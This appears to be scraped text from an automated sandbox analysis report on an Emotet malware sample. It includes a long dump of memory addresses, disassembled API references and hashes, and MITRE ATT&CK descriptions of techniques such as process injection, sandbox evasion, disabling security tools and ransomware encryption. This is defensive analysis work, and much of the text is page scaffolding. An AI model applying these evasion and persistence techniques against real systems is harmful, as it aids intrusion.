0x02aa181a
0x02aa181f
0x02aa1824
0x02aa1828
0x02aa182c
0x02aa1837
0x02aa183b
0x00000000
0x02aa175e
0x02aa175e
0x02aa1763
0x00000000
0x02aa1769
0x02aa1779
0x02aa1782
0x02aa1784
0x02aa1788
0x02aa178a
0x00000000
0x02aa1790
0x02aa1795
0x02aa1796
0x02aa179c
0x02aa179e
0x02aa17a1
0x02aa17a5
0x02aa17a7
0x00000000
0x02aa17ad
0x02aa17ad
0x02aa17b1
0x00000000
0x02aa17b1
0x02aa17a7
0x02aa178a
0x02aa1763
0x02aa175c
0x02aa15fb
0x02aa15fb
0x02aa16e5
0x02aa16ea
0x02aa16ec
0x02aa16ff
0x02aa1704
0x02aa1704
0x02aa170b
0x02aa170d
0x02aa1712
0x02aa1714
0x02aa1727
0x02aa172c
0x02aa172c
0x02aa1738
0x02aa173a
0x02aa173e
0x02aa1743
0x00000000
0x02aa1601
0x02aa1601
0x02aa1606
0x02aa16bf
0x02aa16c4
0x00000000
0x02aa16ca
0x02aa16ce
0x02aa16d3
0x02aa16d7
0x02aa16dc
0x00000000
0x02aa16dc
0x02aa160c
0x02aa160c
0x02aa169f
0x02aa16a4
0x02aa16aa
0x02aa16ae
0x02aa16b5
0x00000000
0x02aa1612
0x02aa1612
0x02aa1617
0x02aa1680
0x02aa1685
0x02aa1689
0x02aa168e
0x00000000
0x02aa1619
0x02aa1619
0x02aa161e
0x00000000
0x02aa1624
0x02aa162c
0x02aa1631
0x02aa1639
0x02aa1641
0x02aa1649
0x02aa1651
0x02aa1656
0x02aa165b
0x02aa165f
0x02aa1662
0x02aa1668
0x02aa166f
0x00000000
0x02aa166f
0x02aa161e
0x02aa1617
0x02aa160c
0x02aa1606
0x02aa15fb
0x00000000
0x02aa14ad
0x02aa14ad
0x02aa14ad
0x02aa14c6
0x00000000
0x02aa14c6

Strings

E?*, xrefs: 02AA1601
a7a&, xrefs: 02AA1612
Ei, xrefs: 02AA17D1
Ei, xrefs: 02AA13C0
a7a&, xrefs: 02AA1548

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: 93ddfd76035c4c273fa8687173df00ec6aa79ce2b8d44fd70550b3bd8bffb5a2
Instruction ID: 4a5b85fd4c60a214f551248d5482d945f13b1cb2c01e353fb5b173009afdd7c7
Opcode Fuzzy Hash: 93ddfd76035c4c273fa8687173df00ec6aa79ce2b8d44fd70550b3bd8bffb5a2
Instruction Fuzzy Hash: DAE17D75644342ABC714DF68D5A0A6BB3E6AFC4344F14492EE49ADB340DF34DD098F92

Uniqueness

Uniqueness Score: -1.00%

Function 02A321A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 02A321F9
SetLastError.KERNEL32(0000007E), ref: 02A3223B

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 75cb809ea0a844d103c4ea53974fc951e45793eae8f30e1a02c2a25c59b38f2a
Instruction ID: 099a5363b9f5c5183ba8957e162dfa066cb873ac091111e5c5abf8d5fb3c3c26
Opcode Fuzzy Hash: 75cb809ea0a844d103c4ea53974fc951e45793eae8f30e1a02c2a25c59b38f2a
Instruction Fuzzy Hash: 3A819774A04209EFDB04CF94C994BAEB7B1FF88314F148198E909AB351CB34AE85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A32430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02A32468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 02A324B2

Strings

@, xrefs: 02A32453

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: e766ee8bb52c8f4fa8db4e030edc157c5f490d7b5c86f8deedfbf012f2be2113
Instruction ID: b6a09f60121f9b587ef30f881595119a096e85d60cb264aabdbbd2645f1e784f
Opcode Fuzzy Hash: e766ee8bb52c8f4fa8db4e030edc157c5f490d7b5c86f8deedfbf012f2be2113
Instruction Fuzzy Hash: AC21E7B0E04209EFDF15CF98C980BADBBB5BF44314F208599ED05AB240CB74AE80DB55

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0TOEtGJHN8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre